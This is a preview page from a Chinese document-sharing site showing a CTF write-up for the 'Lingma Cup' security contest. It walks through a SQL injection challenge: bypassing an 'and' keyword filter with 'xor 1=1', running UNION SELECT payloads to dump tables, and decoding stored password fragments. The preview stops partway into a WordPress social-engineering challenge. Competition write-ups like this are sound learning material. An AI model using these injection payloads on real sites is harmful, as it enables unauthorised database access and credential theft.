凌码杯信安大赛初赛透相关题目解析.docVIP

凌码杯信安大赛初赛透相关题目解析.doc

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
凌码杯信安大赛初赛透相关题目解析

凌码杯信安大赛渗透相关题目解析 (由于是题目,所以和实际渗透过程可能存在脱轨,会显得略坑) (方法不唯一,大牛们就不要藏着了,分享一下你们的方法吧) (如存在描述或其他错误,欢迎反馈,谢谢了) Sql注入题目 环境描述 Windows server2008 r2+php5+mysql5 题目的数据库用户拥有对sql_test,informtion_schema库的select权限! 题目描述 通过图片链接get传参,id=XXX,此为注入点,很容易发现! 通过分析课发现过滤了and关键字 下面是具体过滤代码(关键部分) $id=strtolower($id); $str=array(and,outfile,into); //$id = mysql_real_escape_string($id); $old_id=$id; for($i=0;$i3;$i++) { $id=str_replace($str[$i], ,$id); } if($old_id!=$id) { $error=true; echo br参数中含有非法字符,请不要尝试注入!br/; $ip = GETENV(REMOTE_ADDR); echo br/你的ip: .$ip. 已被记录!br/; header(refresh:2;url=./index.php); } 所以需要绕过,这里采用xor 1=1绕过 以下为相应测试(方法不唯一) 通过order by n返回判断字段为5 测试是否正确(通过xor 1=1) :8088/online/problem/cs18/show.php?id=2 xor 1=1 union select 1,user(),database(),version(),5 已经返回数据了得到数据库sql_test 然后开始爆表 本来正常可以使用where字句定位具体表,个人测试会出错 下面附上语句 sql_test=unhex(0x73716c5) //尝试利用(未找到不能利用原因,求指教) show.php?id=1 xor 1=1 union select 1,2,SCHEMA_NAME,4,5 from information_schema.TABLES where TABLE_SCHEMA=73716c5只好查询所有表信息,通过ctrl+f查找 show.php?id=2 xor 1=1 union select 1,2,3,table_name,table_name from information_schema.tables 查列名 info表 Key1表 Key_save表 Sql_data表里没什么有用信息,这里略过 然后开始爆表里数据 爆key1 :8088/online/problem/cs18/show.php?id=2 xor 1=1 union select 1,2,key1,4,5 from sql_test.key1 这里就获得key1了! 爆key_save表 :8088/online/problem/cs18/show.php?id=2 xor 1=1 union select link_node,key_value1,key_value2,key_value3,link_node from sql_test.key_save 得到表中数据 爆info表 :8088/online/problem/cs18/show.php?id=2 xor 1=1 union select 1,2,info1,info2,5 from sql_ 看到有邮箱,联系到之前的key_save表, 不难想到那是存储处理后的密码! 对之前数据进行处理 7e6a2afe551e067a75fafacf47a6d981 === ^ SnE%40t=== SnE@t===waiT eW91===you 分别采用md5 urlencode hex base64处理 密码明文组合后为 SnE@t^waiT^you 邮箱为:nyber_snert@163.com 登录成功 在草稿箱找到key2 到此为止,sql注入题目解析完毕! 有问题请反馈。 社会工程学题目 1、描述 题目环境采用wordpress搭建,第一个任务就是找到后台登录密码! 整个web没有写权限,大家也不要尝试写马了! 思路就是寻找tips相关信息,获取密码 这个key就不详说了,看到密码就明白了! Key1:xiaolin_a564789324 然后登录后台,发现插件信息 此插件有一漏洞,key.txt就藏在该

文档评论(0)

vtangojia + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档